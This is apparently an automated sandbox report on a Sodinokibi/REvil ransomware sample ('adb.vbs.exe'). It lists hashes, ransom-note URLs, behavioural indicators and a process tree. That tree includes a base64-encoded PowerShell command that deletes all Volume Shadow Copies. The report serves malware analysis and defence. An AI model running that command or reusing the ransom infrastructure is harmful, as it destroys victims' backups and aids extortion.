Analysis
-
max time kernel
125s -
max time network
129s -
platform
windows10-2004_x64 -
resource
win10v2004-20230703-en -
resource tags
arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system -
submitted
09-08-2023 07:35
Static task
static1
Behavioral task
behavioral1
Sample
adb.vbs.exe
Resource
win7-20230712-en
Behavioral task
behavioral2
Sample
adb.vbs.exe
Resource
win10-20230703-en
Behavioral task
behavioral3
Sample
adb.vbs.exe
Resource
win10v2004-20230703-en
General
-
Target
adb.vbs.exe
-
Size
116KB
-
MD5
b86ad4241b01376b3924a380f6f4c934
-
SHA1
10682d08a18715a79ee23b58fdb6ee44c4e28c61
-
SHA256
14c8e3f1f23d16c2c9a4272cd05d00461d27b372cc5f588b4bbfc6102bbed708
-
SHA512
54fd19cfc37255e7ddf3456d1a2989558522cf58e5eee6ca916c19542921fe3ba4e7a431a35e0e1edbfc37c5651d392e7c3c54eb408754c0488021b16fdf92c9
-
SSDEEP
1536:aTZINbRh0SKws6KTUkmHlntMvfWhbpfCqeICS4AKvQIFlswOmZFS0cnwpIGmQwB:FRix3PWhNlOVFmw5q0cifmQ
Malware Config
Extracted
C:\Recovery\5myuz6ci-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/4EA0548D3417256B
http://decryptor.cc/4EA0548D3417256B
Signatures
-
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Enumerates connected drives 3 TTPs 25 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
adb.vbs.exedescription ioc process File opened (read-only) \??\B: adb.vbs.exe File opened (read-only) \??\H: adb.vbs.exe File opened (read-only) \??\I: adb.vbs.exe File opened (read-only) \??\P: adb.vbs.exe File opened (read-only) \??\X: adb.vbs.exe File opened (read-only) \??\V: adb.vbs.exe File opened (read-only) \??\E: adb.vbs.exe File opened (read-only) \??\G: adb.vbs.exe File opened (read-only) \??\K: adb.vbs.exe File opened (read-only) \??\O: adb.vbs.exe File opened (read-only) \??\S: adb.vbs.exe File opened (read-only) \??\W: adb.vbs.exe File opened (read-only) \??\D: adb.vbs.exe File opened (read-only) \??\J: adb.vbs.exe File opened (read-only) \??\M: adb.vbs.exe File opened (read-only) \??\R: adb.vbs.exe File opened (read-only) \??\T: adb.vbs.exe File opened (read-only) \??\U: adb.vbs.exe File opened (read-only) \??\Z: adb.vbs.exe File opened (read-only) \??\F: adb.vbs.exe File opened (read-only) \??\A: adb.vbs.exe File opened (read-only) \??\L: adb.vbs.exe File opened (read-only) \??\N: adb.vbs.exe File opened (read-only) \??\Q: adb.vbs.exe File opened (read-only) \??\Y: adb.vbs.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
adb.vbs.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\4xbb7cv4.bmp" adb.vbs.exe -
Drops file in Program Files directory 13 IoCs
Processes:
adb.vbs.exedescription ioc process File opened for modification \??\c:\program files\UnblockResume.ttc adb.vbs.exe File created \??\c:\program files\5myuz6ci-readme.txt adb.vbs.exe File opened for modification \??\c:\program files\ConvertFromStop.temp adb.vbs.exe File opened for modification \??\c:\program files\EditSave.mpg adb.vbs.exe File opened for modification \??\c:\program files\SplitRequest.xlsb adb.vbs.exe File opened for modification \??\c:\program files\MeasureTest.temp adb.vbs.exe File opened for modification \??\c:\program files\SendExport.gif adb.vbs.exe File opened for modification \??\c:\program files\SplitRepair.css adb.vbs.exe File opened for modification \??\c:\program files\UndoPing.mid adb.vbs.exe File created \??\c:\program files (x86)\5myuz6ci-readme.txt adb.vbs.exe File opened for modification \??\c:\program files\ImportStep.dxf adb.vbs.exe File opened for modification \??\c:\program files\ImportUnlock.cr2 adb.vbs.exe File opened for modification \??\c:\program files\MeasureSkip.pptm adb.vbs.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
adb.vbs.exepowershell.exepid process 4688 adb.vbs.exe 4688 adb.vbs.exe 3208 powershell.exe 3208 powershell.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
Processes:
adb.vbs.exepowershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 4688 adb.vbs.exe Token: SeDebugPrivilege 3208 powershell.exe Token: SeBackupPrivilege 3616 vssvc.exe Token: SeRestorePrivilege 3616 vssvc.exe Token: SeAuditPrivilege 3616 vssvc.exe Token: SeTakeOwnershipPrivilege 4688 adb.vbs.exe -
Suspicious use of WriteProcessMemory 2 IoCs
Processes:
adb.vbs.exedescription pid process target process PID 4688 wrote to memory of 3208 4688 adb.vbs.exe powershell.exe PID 4688 wrote to memory of 3208 4688 adb.vbs.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\adb.vbs.exe"C:\Users\Admin\AppData\Local\Temp\adb.vbs.exe"1⤵
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4688 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3208
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:5012
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3616
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
7KB
MD508b82cbcd7604cbadb77c969c72b3213
SHA11a200851e58f2c5119f9aeba2182396a5a0cfc3f
SHA256f879d65f8677f3094b7f2a520863e0493fd64708feb49efec71785b1d4712d79
SHA51276d3f5bdf8840b6bf819dc1fb544a4b3f886b885e0794d5d76fa6d873a6bfd90a17dc1048bb726a41e82a50be8faaeaad6f62d0c63b0f297c634c3b785df6e57
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82